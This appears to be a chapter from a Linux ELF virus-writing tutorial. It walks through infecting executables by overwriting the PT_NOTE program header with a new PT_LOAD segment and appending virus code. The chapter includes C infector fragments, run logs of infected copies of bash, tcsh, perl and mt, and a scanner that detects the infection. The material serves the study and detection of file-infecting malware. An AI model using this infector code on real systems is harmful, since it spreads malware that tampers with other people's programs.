Perfection is reached, not when there is no longer anything to add, but when there is no longer anything to take away. | |
Antoine de Saint-Exupery |
Adding a second code segment to an executable is a very simple infection method. Doing that by overwriting an otherwise unused program header makes the method even simplier. Another nice aspect is that it imposes no size limit on inserted code. Unfortunately the infection is trivial to detect. Of course Scan segment padding will detect the result of this chapter ("has 3 LOAD segments"). But then even the untrained eye can spot the difference in the output of readelf(1).
Have a look at readelf(1)'s output on /bin/sh. The last program header is of type NOTE and has exactly 0x20 bytes. So what's in there?
Command: pre/i386-redhat7.3-linux/additional_cs/hexdump.sh
#!/bin/bash
file=${1:-/bin/bash}
/usr/bin/readelf -l ${file} \
| /bin/grep '^ *NOTE *' \
| while read Type Offset VirtAddr PhysAddr FileSiz MemSiz rest
do
ofs=$( echo "ibase=16; ${VirtAddr#0x} - 08048000" | bc )
size=$( echo "ibase=16; ${FileSiz#0x}" | bc )
/usr/bin/hexdump -f pre/i386-redhat7.3-linux/format.hex -s ${ofs} -n ${size} < ${file}
done |
Output: out/i386-redhat7.3-linux/additional_cs/hexdump
0108 04 00 00 00 10 00 00 00 01 00 00 00 47 4e 55 00 ............GNU.
0118 00 00 00 00 02 00 00 00 02 00 00 00 05 00 00 00 ................ |
It's the magic of the GNU. In this special case we can live without. NetBSD documentation includes a good description in chapter "Vendor-specific ELF Note Elements". [1] And LSB has this to say: [2]
Every executable shall contain a section named .note.ABI-tag of type SHT_NOTE. This section is structured as a note section as documented in the ELF spec. The section must contain at least the following entry. The name field (namesz/name) contains the string "GNU". The type field shall be 1. The descsz field shall be at least 16, and the first 16 bytes of the desc field shall be as follows.
The first 32-bit word of the desc field must be 0 (this signifies a Linux executable). The second, third, and fourth 32-bit words of the desc field contain the earliest compatible kernel version. For example, if the 3 words are 2, 2, and 5, this signifies a 2.2.5 kernel.
Overwrite program header of type of NOTE with a code segment definition (type LOAD).
Append virus code at end of file.
Having just 28 bytes our unrealistic code, Infection #1, is small enough to fit into the NOTE segment. But let's pretend this is a real example. I will reuse the framework from One step closer (i).
Double infection is again impossible by design. If there is no PT_NOTE this target is out of reach.
Source: src/additional_cs/patch_phdr.inc
bool target_patch_phdr(Target* t)
{
TEVWH_ELF_PHDR* note = t->phdr + 5;
if (note->p_type != PT_NOTE)
return false;
note->p_type = PT_LOAD;
/* align up multiple of 16 */
note->p_offset = t->aligned_filesize;
note->p_vaddr =
note->p_paddr = target_new_entry_addr(t);
note->p_filesz =
note->p_memsz = sizeof(infection);
note->p_flags = t->phdr[2].p_flags;
note->p_align = t->phdr[2].p_align;
return true;
} |
We can use any memory region not already occupied. Using one below the magic base of 0x8048000 avoids trouble. See Segment padding infection (i) for an explanation of % 0x1000.
Source: src/additional_cs/new_entry_addr.inc
TEVWH_ELF_OFF target_new_entry_addr(const Target* t)
{
return TEVWH_ELF_BASE - 32 * TEVWH_ELF_PAGE_SIZE
+ t->aligned_filesize % TEVWH_ELF_PAGE_SIZE;
} |
Not implemented. To cover the bytes of the new LOAD segment with a section we would have to insert a new one in the array of section headers. Right now I'm not in the mood to invest so much time in a hopeless case.
Source: src/additional_cs/patch_shdr.inc
bool target_patch_shdr(Target* t)
{
return true; /* not implemented */
} |
Source: src/additional_cs/copy_and_infect.inc
bool target_copy_and_infect(Target* t, size_t* code_size)
{
TRACE_DEBUG(-1, "target_copy_and_infect\n");
CHECK_WRITE(t->image.b, t->filesize); /* original target */
CHECK_LSEEK(t->aligned_filesize, SEEK_SET);
return target_write_infection(t, code_size);
} |
Output: out/i386-redhat7.3-linux/additional_cs/e3i1/infect
/bin/tcsh ... wrote 26 bytes, Ok
/usr/bin/perl ... wrote 26 bytes, Ok
/bin/mt ... wrote 26 bytes, Ok
/bin/bash ... wrote 26 bytes, Ok
files=4; ok=4; failed=0 |
Output: out/i386-redhat7.3-linux/additional_cs/test-e3i1
ELFtmp/i386-redhat7.3-linux/additional_cs/e3i1/bash_infected
2.05a.0(1)-release
ELFusage: mt [-v] [--version] [-h] [ -f device ] command [ count ]
ELFtcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF
This is perl, v5.6.1 built for i386-linux
---
BFD: tmp/i386-redhat7.3-linux/additional_cs/e3i1/strip_bash_infected: warning: Empty loadable segment detected
out/i386-redhat7.3-linux/additional_cs/test-e3i1.sh: line 11: 2438 Segmentation fault (core dumped) tmp/i386-redhat7.3-linux/additional_cs/e3i1/strip_bash_infected --version |
The method works, but is not safe to strip(1). Well, on to readelf(1). Compare it with the original.
Output: out/i386-redhat7.3-linux/additional_cs/readelf
-rwxrwxr-x 1 alba alba 541130 Jan 7 20:10 tmp/i386-redhat7.3-linux/additional_cs/e3i1/bash_infected
Elf file type is EXEC (Executable file)
Entry point 0x8059440
There are 6 program headers, starting at offset 52
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x000c0 0x000c0 R E 0x4
INTERP 0x0000f4 0x080480f4 0x080480f4 0x00013 0x00013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x7e414 0x7e414 R E 0x1000
LOAD 0x07e420 0x080c7420 0x080c7420 0x05934 0x09ad0 RW 0x1000
DYNAMIC 0x083a0c 0x080cca0c 0x080cca0c 0x000d8 0x000d8 RW 0x4
LOAD 0x0841b0 0x080281b0 0x080281b0 0x0001a 0x0001a R E 0x1000
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata
03 .data .eh_frame .dynamic .ctors .dtors .got .bss
04 .dynamic
05 |
File size grew 541130 - 541096 = 34 bytes. But even an unmodified entry point is pointless in this case. Anybody can notice LOAD instead of NOTE.
Command: pre/i386-redhat7.3-linux/additional_cs/scan_dist.sh
#!/bin/bash
/bin/echo "/bin/bash
tmp/i386-redhat7.3-linux/additional_cs/e3i1/bash_infected" \
| tmp/i386-redhat7.3-linux/scanner/segment |
Output: out/i386-redhat7.3-linux/additional_cs/scan
/bin/bash ... delta=0x100c, Ok
CHECK: tmp/i386-redhat7.3-linux/additional_cs/e3i1/bash_infected
CHECK: src/scanner/segment/get_seg.inc#23
CHECK: (nr_load) == (2)
CHECK: 3 == 2; 0x3 == 0x2
files=2; ok=1; det_page=1; det_align=0; min=0x100c; max=0x0000 |
Case closed. Guilty of failure.
[1] | |
[2] |